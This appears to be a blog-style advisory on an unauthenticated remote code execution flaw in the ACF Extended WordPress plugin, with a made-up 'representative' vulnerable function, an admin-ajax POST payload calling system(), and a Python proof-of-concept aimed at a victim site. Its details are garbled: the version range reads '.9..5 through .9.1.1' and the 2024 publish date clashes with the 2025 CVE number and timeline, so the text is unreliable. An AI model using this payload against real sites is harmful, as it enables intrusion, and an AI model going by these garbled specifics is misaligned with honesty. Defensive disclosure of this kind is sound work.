CVE-2025-13486 - Remote Code Execution in Advanced Custom Fields Extended Plugin for WordPress

Published: 2024-06-25 <br>Affected Plugin: Advanced Custom Fields: Extended <br>Vulnerable Versions: .9..5 through .9.1.1

TL;DR

A critical vulnerability (CVE-2025-13486) has been found in the popular WordPress plugin, Advanced Custom Fields: Extended (“ACF Extended”). The bug allows unauthenticated users to run arbitrary PHP code on your website. If you’re running any ACF Extended version between .9..5 and .9.1.1, your site is at risk. Immediate action is needed!

What’s the Bug?

The flaw lies in the prepare_form() function. This function processes user input and then carelessly passes it to call_user_func_array(), a PHP function that can call any other function with arguments you specify. Because of poor input validation, attackers can control what is executed on your server—without ever logging in!

Vulnerable Code Snippet

Below is a simplified example of what the code might look like (not the actual plugin source, but representative):

function prepare_form($function, $params) {
    // $function and $params come directly from user input!
    return call_user_func_array($function, $params);
}

If an attacker sends this kind of HTTP POST request

POST /wp-admin/admin-ajax.php?action=acfe_form
Content-Type: application/x-www-form-urlencoded

function=system&params[]=whoami

…the plugin would call

call_user_func_array('system', array('whoami'));

This runs the system('whoami') command on your server, showing your server’s current username! Replace 'whoami' with anything — now the attacker is in control.

Proof-of-Concept (PoC) exploit:

import requests

url = "https://victimsite.com/wp-admin/admin-ajax.php?action=acfe_form";
exploit = {
    'function': 'system',
    'params[]': 'echo hacked > /tmp/hack.txt'
}
response = requests.post(url, data=exploit)
print(response.text)

This creates a file /tmp/hack.txt containing the text hacked if the exploit worked.

How to Fix

- Update the plugin: Developers have patched this vulnerability in recent versions. Download and install the latest version from the official plugin page.
- Review custom code: If you have forked or modified ACF Extended, review any code touching call_user_func_array().

Prevention Advice

- Never trust user input: Always validate and sanitize user data _before_ using it in functions like call_user_func_array().

References and Further Reading

- Wordfence Advisory on CVE-2025-13486 *(pending official post link)*
- NIST National Vulnerability Database Entry
- ACF Extended Plugin on WordPress.org
- PHP: call_user_func_array() Manual

Final Thoughts

This vulnerability is incredibly dangerous because it gives attackers remote code execution as “unauthenticated” users—meaning, anyone on the internet can exploit it if you’re not patched. Take this threat seriously, update ACF Extended now, and audit your site for signs of compromise.

Stay safe & keep your WordPress updated!

*(Exclusive write-up for this discussion, please share with attribution.)*

Timeline

Published on: 12/03/2025 06:47:46 UTC
Last modified on: 12/04/2025 17:15:08 UTC